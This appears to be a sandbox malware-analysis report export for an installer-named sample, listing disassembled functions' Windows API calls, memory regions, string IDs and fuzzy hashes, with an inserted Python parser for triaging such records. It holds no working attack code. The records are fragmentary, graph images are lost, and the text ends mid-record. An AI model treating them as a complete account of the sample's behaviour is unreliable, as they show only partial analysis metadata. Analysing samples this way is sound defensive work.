                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: 8731c558dacfd09210ed97cc83a567fcda7d0603a3826fcc512cd6b42a1a92e6
                              • Instruction ID: 3d120fd4ae20808eac2f3ff8ec300f3f0bf341117945f7185c428e664e858fac
                              • Opcode Fuzzy Hash: 8731c558dacfd09210ed97cc83a567fcda7d0603a3826fcc512cd6b42a1a92e6
                              • Instruction Fuzzy Hash: FDA15A32A041459FCF0A8FA8CC517AE3BB5AF6B328F144259E821AF781D735D916CB52

                              Control-flow Graph
                              • Graph rendering not recoverable from the text export (executed / not-executed block shading lost); function starting at 6c99c1e0, whose blocks call WriteFile and ReadFile
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: 1ab72d555d8dcb7c7476ecf421390fc58935475e59bc13c574f6195f47cfbec3
                              • Instruction ID: 298e81d56613637914ec7ffe79853b5b22250938bdc3cf16ed4adcfe6af653fb
                              • Opcode Fuzzy Hash: 1ab72d555d8dcb7c7476ecf421390fc58935475e59bc13c574f6195f47cfbec3
                              • Instruction Fuzzy Hash: 72717CB0208385AFD710DF55C980B6ABBF8BF8A708F54492EF498D6651D371D8489B93
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: 7a28a30832a15c4c61f3e0c3b1cd59f5df35a3ec5ef27b741f54d30d90eeb9f3
                              • Instruction ID: 7a5c3ac38e7156aa3effa1c814a0230168c4c982886e006d18b83b47b6fd11eb
                              • Opcode Fuzzy Hash: 7a28a30832a15c4c61f3e0c3b1cd59f5df35a3ec5ef27b741f54d30d90eeb9f3
                              • Instruction Fuzzy Hash: 764256B4609342CFD764CF18C490A2ABBF5AFD9714F288E1EE59987B20D638D845CB53
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: 749f8d475982ed16740027bfe7c2b4b027ad5a93bd6948465b5e967fd36e08ed
                              • Instruction ID: afa9662e1f6a92738e630c428530c929fd78a7207fc72d282671925e6dd55687
                              • Opcode Fuzzy Hash: 749f8d475982ed16740027bfe7c2b4b027ad5a93bd6948465b5e967fd36e08ed
                              • Instruction Fuzzy Hash: 7203E231645B018FC738CF28C9D0696B7E3AFE5328759CE6DC0A64BA95DB74B44ACB40

                              Control-flow Graph
                              • Graph rendering not recoverable from the text export (executed / not-executed block shading lost); function starting at 6c9c4ff0, whose blocks call CreateProcessA, WaitForSingleObject and CloseHandle
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: 4e02491ee34529bdaf0639b6145304d7aeca6d07272c480d24f72b39657587d9
                              • Instruction ID: ae037481394ddc1b268182c1095c81c7feed4bef9ec70dc4ef696e13e4f72eed
                              • Opcode Fuzzy Hash: 4e02491ee34529bdaf0639b6145304d7aeca6d07272c480d24f72b39657587d9
                              • Instruction Fuzzy Hash: BF310170909380CFD740DF28C19872ABBF0EB8A358F509A1DF89986250E775D5898F43

                              Control-flow Graph
                              • Graph rendering not recoverable from the text export (executed / not-executed block shading lost); function starting at 6c9dbc5e, whose blocks call WriteFile and GetLastError
                              APIs
                                • Part of subcall function 6C9DBEB1: GetConsoleCP.KERNEL32(?,6C9DB0D0,?), ref: 6C9DBEF9
                              • WriteFile.KERNEL32(?,?,6C9E46EC,00000000,00000000,?,00000000,00000000,6C9E5AB6,00000000,00000000,?,00000000,6C9DB0D0,6C9E46EC,00000000), ref: 6C9DBDAF
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C9E46EC,6C9DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C9DBDB9
                              • __dosmaperr.LIBCMT ref: 6C9DBDFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: f463d1d98b4d28ef8627c5d441b2bfdbf480deeaef697b6fc935f04764769c82
                              • Instruction ID: 99172af25727992686ca62ce9bc08013d8c0b72ee5222ca88fa5a36ae2276a2b
                              • Opcode Fuzzy Hash: f463d1d98b4d28ef8627c5d441b2bfdbf480deeaef697b6fc935f04764769c82
                              • Instruction Fuzzy Hash: 1151E6B1A00A0AAFDF01DFA8C840BEEBB79EF1635CF168451E510B7A51D730F94587A1

                               Control-flow Graph

                               Control-flow graph (rendered image not recoverable): function body spans 6c9c5b90-6c9c5d49; no Win32 API is called directly; internal calls to 6c8901f0, 6c9d0b18, 6c892250, 6c892340, 6c9c9379, 6c88e010 and 6c9c7088.
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C5D31
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: a797937d45d0896b2334ccfea244bc5d8476808ec5a91d7f337c582c99e7e815
                              • Instruction ID: bd992865c8fe6b31f6be9ecc4465c208a91b895f6250f31404b016dec0845557
                              • Opcode Fuzzy Hash: a797937d45d0896b2334ccfea244bc5d8476808ec5a91d7f337c582c99e7e815
                              • Instruction Fuzzy Hash: 3D5133B5600B008FD725CF19C585BA6BBF5FB58318F008A2DD8964BB90D775E90ACB91

                               Control-flow Graph

                               Control-flow graph (rendered image not recoverable): function body spans 6c9db925-6c9db9c0; block 6c9db973-6c9db983 calls CloseHandle, block 6c9db985-6c9db98b calls GetLastError; internal calls to 6c9e15a2, 6c9e171f and 6c9cf9f2.
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C9E425F), ref: 6C9DB97B
                              • GetLastError.KERNEL32(?,00000000,?,6C9E425F), ref: 6C9DB985
                              • __dosmaperr.LIBCMT ref: 6C9DB9B0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: 9b55e8c9c87ea686bca696b5bee546139243b8dc5dbb905fee4a96d76251562a
                              • Instruction ID: cf3c9b8300f34e6263b816115c7ed322690212adf99e720b55a53490fc2b4a8c
                              • Opcode Fuzzy Hash: 9b55e8c9c87ea686bca696b5bee546139243b8dc5dbb905fee4a96d76251562a
                              • Instruction Fuzzy Hash: D8014833A099A01AC305077A9855B9D27BD4FB7B3CF3A8749E825A7BC2CF60E8458250
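The function records in this report (the APIs, Memory Dump Source and Similarity blocks) are easier to triage once they are parsed than read one by one. The following parser is an added example, not code from Joe Sandbox or from the analysed sample: it turns the two records above (the WriteFile wrapper and the CloseHandle wrapper) into structured objects, keeps subcall lines separate from the function's own calls, and maps each "ref" address to the dump region that contains it. The sample text is adapted from those records; the interpretation of the .sdmp file name (process index in the first field, region base in the fourth, PAGE_* protection in the fifth) is an assumption inferred from the names on this page, not taken from Joe Sandbox documentation.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source /
Similarity blocks) so functions can be pivoted on by API, region and hash."""
import re
from dataclasses import dataclass, field

# PAGE_* memory protection constants from winnt.h.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}

# "WriteFile.KERNEL32(?,?), ref: 6C9DBDAF" or "__dosmaperr.LIBCMT ref: 6C9DBDFE",
# optionally prefixed with "Part of subcall function <addr>: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<name>.+?)\.(?P<module>[A-Z0-9]+)(?P<args>\(.*\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$")
DUMP_RE = re.compile(r"[0-9A-F.]+\.sdmp", re.I)
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+(?:ID|Hash)):\s*(?P<val>.*)$")


@dataclass
class DumpRegion:
    pid: int
    base: int
    protect: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, hex(self.protect))


def parse_dump_name(name: str) -> DumpRegion:
    """ASSUMPTION: field 0 = process index, field 3 = region base,
    field 4 = PAGE_* protection (inferred from the report's file names)."""
    f = name.split(".")
    return DumpRegion(pid=int(f[0]), base=int(f[3], 16), protect=int(f[4], 16))


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (name, module, ref, subcall_addr)
    regions: list = field(default_factory=list)  # DumpRegion objects, source first
    fields: dict = field(default_factory=dict)   # Similarity block key -> value

    @property
    def entry(self):
        """Lowest call-site address inside the function itself; subcall
        entries are attributed to the callee and skipped."""
        refs = [ref for _, _, ref, sub in self.apis if sub is None]
        return min(refs) if refs else None

    def region_of(self, addr: int):
        """Region with the highest base not above addr (each region is
        taken to extend up to the next listed base)."""
        below = [r for r in self.regions if r.base <= addr]
        return max(below, key=lambda r: r.base) if below else None


def parse_records(text: str) -> list:
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], int(m["ref"], 16), m["sub"]))
            continue
        if line.startswith(("Source File:", "Associated:")):
            d = DUMP_RE.search(line)          # ignores the "Download File" residue
            if d:
                cur.regions.append(parse_dump_name(d.group(0)))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.fields[f["key"]] = f["val"]
            if f["key"] == "Instruction Fuzzy Hash":   # last field of every record
                records.append(cur)
                cur = FunctionRecord()
    return records


def functions_calling(records, api_name: str) -> list:
    """Records whose own body (not a subcall) calls api_name."""
    return [r for r in records
            if any(n == api_name and sub is None for n, _, _, sub in r.apis)]


# Constructed sample, adapted from the two records above (arguments shortened).
SAMPLE = """
APIs
  • Part of subcall function 6C9DBEB1: GetConsoleCP.KERNEL32(?,6C9DB0D0,?), ref: 6C9DBEF9
• WriteFile.KERNEL32(?,?,6C9E46EC,00000000), ref: 6C9DBDAF
• GetLastError.KERNEL32(?,?,6C9E46EC,6C9DB0D0), ref: 6C9DBDB9
• __dosmaperr.LIBCMT ref: 6C9DBDFE
Memory Dump Source
• Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
• Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
• Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
Similarity
• API ID: ConsoleErrorFileLastWrite__dosmaperr
• String ID: 8Q
• Instruction Fuzzy Hash: 1151E6B1A00A0AAFDF01DFA8C840BEEBB79EF1635CF168451E510B7A51D730F94587A1
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,?,6C9E425F), ref: 6C9DB97B
• GetLastError.KERNEL32(?,00000000,?,6C9E425F), ref: 6C9DB985
• __dosmaperr.LIBCMT ref: 6C9DB9B0
Memory Dump Source
• Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• Instruction Fuzzy Hash: D8014833A099A01AC305077A9855B9D27BD4FB7B3CF3A8749E825A7BC2CF60E8458250
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        region = rec.region_of(rec.entry)
        print(f"{rec.entry:08X} in {region.base:08X} ({region.protect_name}): "
              f"{rec.fields.get('API ID')}")
```

Pivoting on `functions_calling(records, "GetLastError")` returns both records, while `"GetConsoleCP"` returns none, because that call sits in the subcall at 6C9DBEB1 rather than in the function being described; mapping the call sites to the 6C841000 region shows they live in the PAGE_EXECUTE_READ code section of the module based at 6C840000, whereas the 6C9F8000 region is PAGE_WRITECOPY data.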

                               Control-flow Graph

                               Control-flow graph (rendered image not recoverable): function body spans 6c9d0b9c-6c9d0c12; no Win32 API is called directly; internal calls to 6c9cf9cc, 6c9d0120, 6c9d0cb9, 6c9d873e, 6c9d9c60, 6c9db898, 6c9dae75 and 6c9d47bb.
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: 381904dcffa6fe22e1d2d2b209cd2741109ea6c066c59c3728de80969f6f58cc
                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction Fuzzy Hash: E1F0D132501E546ACB211A39AD00BCB36A89F7237CF139715E864B3ED0DB74F40AC6A2
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C5AB4
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C5AF4
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: e05d6a140103f57a9a27d2f6514843646cd5295afc3cc0528ac6717de702f700
                              • Instruction ID: c7b3488b30616eeae667fc0ab7a99eaee9d2ee1ac0e692e12049830a8edeee3b
                              • Opcode Fuzzy Hash: e05d6a140103f57a9a27d2f6514843646cd5295afc3cc0528ac6717de702f700
                              • Instruction Fuzzy Hash: B2511671201B00DBE735CF25C585BE6BBE4BB18718F448A5CD4AA4BB91DB30F549CB82
                              APIs
                              • GetLastError.KERNEL32(6C9F6DD8,0000000C), ref: 6C9CEF52
                              • ExitThread.KERNEL32 ref: 6C9CEF59
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: f53e40e192f2aec3644924c997c1660da63f009b18ead301062e33c90641c91d
                              • Instruction ID: db1f36596117c72b035aa01fe80723093ad60d04a4c3c69c2228a84119cbbd75
                              • Opcode Fuzzy Hash: f53e40e192f2aec3644924c997c1660da63f009b18ead301062e33c90641c91d
                              • Instruction Fuzzy Hash: 45F0F671A00604AFDB04AFB0D80AAAE3B74FF61314F258649E016E7B41DF30E915CFA2
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 71f730a4e8cd326d9d02f9a15e646cfb3ea115d0785c939bafae6ad0be515e36
                              • Instruction ID: a32b063970125da91b1a019cac39e371468b1af4fb5ef7730b0dd634538de03a
                              • Opcode Fuzzy Hash: 71f730a4e8cd326d9d02f9a15e646cfb3ea115d0785c939bafae6ad0be515e36
                              • Instruction Fuzzy Hash: E2118C71A0420EAFCF05CF58E945ADB3BF8EF48304F058059F808AB301D631EA11CBA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: b7f64ba8aa6ad03ad2060edd71fba4f8aabbc9ad6c58320dd7e3bcb79c5a134a
                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction Fuzzy Hash: 49012C72C01159EFCF029FE88D009EE7FB5AF28214F144165BD24A26A0E731CA24DF91
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C9E4115,?,?,00000000,?,6C9E4115,00000000,0000000C), ref: 6C9E4474
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 35042d1862107f5f7e4a13900c2a1a3c71fad93f2a1c33bbc703c60c522b7cde
                              • Instruction ID: 36ae21765297044c2b5529216728c7bba629eca0377eb0207a73f906547b1dcd
                              • Opcode Fuzzy Hash: 35042d1862107f5f7e4a13900c2a1a3c71fad93f2a1c33bbc703c60c522b7cde
                              • Instruction Fuzzy Hash: 73D06C3210410DBBDF028E84DD06EDA3BAAFB88715F114010BA1856020C732E861AB90
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction ID: bd179ddf83c7baf4875261abab09029ac00b72b483bdcd4d358f0d04104174df
                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction Fuzzy Hash:
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA584B1
